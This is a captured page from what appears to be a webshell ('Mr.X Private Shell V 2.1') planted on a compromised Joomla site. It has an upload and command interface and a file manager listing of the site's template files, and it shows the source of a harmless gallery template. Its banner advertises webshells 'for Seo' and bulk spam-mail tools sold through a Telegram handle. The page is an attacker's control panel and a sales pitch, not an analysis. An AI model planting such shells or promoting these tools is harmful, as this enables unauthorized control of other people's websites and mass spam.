__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * @package Helix3 Framework
 * @author JoomShaper https://www.joomshaper.com
 * @copyright (c) 2010 - 2021 JoomShaper
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('JPATH_BASE') or die;
?>

<?php if ($displayData['params']->get('gallery')) : ?>
	<?php $images = json_decode( $displayData['params']->get('gallery') ); ?>
	<?php if( count( $images->gallery_images ) ) : ?>
		<div id="carousel-gallery-<?php echo $displayData['item']->id; ?>" class="entry-gallery carousel slide" data-ride="carousel">
			<div class="carousel-inner">
				<?php foreach ( $images->gallery_images as $key => $image ) : ?>
					<div class="carousel-item<?php echo ($key===0) ? ' active': ''; ?>">
						<img src="<?php echo $image; ?>" alt="">
					</div>
				<?php endforeach; ?>
			</div>

			<a class="carousel-control-prev carousel-left" href="#carousel-gallery-<?php echo $displayData['item']->id; ?>" role="button" data-bs-slide="prev">
				<span class="fa fa-angle-left" aria-hidden="true"></span>
				<span class="sr-only">Previous</span>
			</a>
			<a class="carousel-control-next carousel-right" href="#carousel-gallery-<?php echo $displayData['item']->id; ?>" role="button" data-bs-slide="next">
				<span class="fa fa-angle-right" aria-hidden="true"></span>
				<span class="sr-only">Next</span>
			</a>
		</div>
	<?php endif; ?>
<?php endif; ?>

Filemanager

Name Type Size Permission Actions
icons.php File 1.08 KB 0664
post_audio.php File 415 B 0664
post_gallery.php File 1.35 KB 0664
post_link.php File 626 B 0664
post_quote.php File 607 B 0664
post_status.php File 408 B 0664
post_video.php File 1.34 KB 0664
Filemanager